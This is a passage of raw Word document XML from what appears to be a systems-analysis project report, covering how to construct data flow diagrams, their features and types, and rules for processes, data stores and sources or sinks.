                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="27" name="Line 10"/>
                        <wps:cNvCnPr/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2177" y="9125"/>
                            <a:ext cx="0" cy="864"/>
                          </a:xfrm>
                          <a:prstGeom prst="line">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:round/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="28" name="Line 11"/>
                        <wps:cNvCnPr/>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="2340" y="9125"/>
                            <a:ext cx="0" cy="864"/>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36.85pt;margin-top:12.35pt;height:43.75pt;width:79.6pt;z-index:251662336;mso-width-relative:page;mso-height-relative:page;" coordorigin="2177,9125" coordsize="1592,875" o:gfxdata="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&#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uu9s82QAAAAkBAAAPAAAAAAAAAAEAIAAAACIAAABk&#10;cnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJAt7n37HcCAABbCQAADgAAAAAAAAABACAAAAAo&#10;AQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAAEQYAAAAA&#10;">
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:line id="Line 8" o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:2185;top:9125;height:0;width:1584;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA+Se5jb0AAADb&#10;AAAADwAAAGRycy9kb3ducmV2LnhtbEWPzYvCMBTE7wv+D+EJexFN7LI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J7m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 o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:2185;top:10000;height:0;width:1584;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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1J/q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0" o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:2177;top:9125;height:864;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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YJ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1" o:spid="_x0000_s1026" o:spt="20" style="position:absolute;left:2340;top:9125;height:864;width:0;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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JhYT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p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="72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Data Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="2880" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc18733"/>
      <w:bookmarkStart w:id="70" w:name="_Toc43339157"/>
      <w:bookmarkStart w:id="71" w:name="_Toc27704"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Constructing a DFD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
    </w:p>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Several rules of thumb are used in drawing DFD’S:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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Process should be named and numbered for an easy reference.  Each name should be representative of the process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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When a process is exploded into lower level details, they are numbered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>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names of data stores and destinations are written in capital letters. Process and dataflow names have the first letter of each work capitalized</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="72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DFD typically shows the minimum contents of data store.  Each data store should contain all the data elements that flow in and out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="72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Questionnaires should contain all the data elements that flow in and out.  Missing interfaces redundancies and like is then accounted for often through interviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc43339158"/>
      <w:bookmarkStart w:id="73" w:name="_Toc24180"/>
      <w:bookmarkStart w:id="74" w:name="_Toc29193"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Salient Features of DFDs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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DFD shows flow of data, not of control loops and decision are controlled considerations do not appear on a DFD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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DFD does not indicate the time factor involved in any process whether the dataflow take place daily, weekly, monthly or yearly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:after="240"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sequence of events is not brought out on the DFD.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc1208"/>
      <w:bookmarkStart w:id="76" w:name="_Toc43339159"/>
      <w:bookmarkStart w:id="77" w:name="_Toc28904"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Types of data flow diagrams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc23475"/>
      <w:bookmarkStart w:id="79" w:name="_Toc28515"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Current Physical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc30558"/>
      <w:bookmarkStart w:id="81" w:name="_Toc3166"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Current Logical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc2234"/>
      <w:bookmarkStart w:id="83" w:name="_Toc3864"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>New Logical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc5376"/>
      <w:bookmarkStart w:id="85" w:name="_Toc20759"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>New Physical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="_Toc43339160"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Current physical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"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pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc43339161"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Current logical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"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The physical aspects at the system are removed as much as possible so that the current system is reduced to its essence to the data and the processors that transform them regardless of actual physical form.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc43339162"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>New logical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"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b/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">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pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc43339163"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>New physical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>The new physical represents only the physical implementation of the new system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc9936"/>
      <w:bookmarkStart w:id="91" w:name="_Toc26374"/>
      <w:bookmarkStart w:id="92" w:name="_Toc43339164"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Rules governing the DFDs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc43339165"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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No process can have only outputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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No process can have only inputs.  If an object has only inputs than it must be a sink.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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process has a verb phrase label.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc43339166"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Data store</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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Data cannot move directly from one data store to another data store, a process must move data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>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Data cannot move directly from an outside source to a data store, a process, which receives, must move data from the source and place the data into data store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>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store has a noun phrase label.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc43339167"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Source or Sink</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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The origin and /or destination of data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Data cannot move direly from a source to sink it must be moved by a process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:num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source and /or sink has a noun phrase land.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
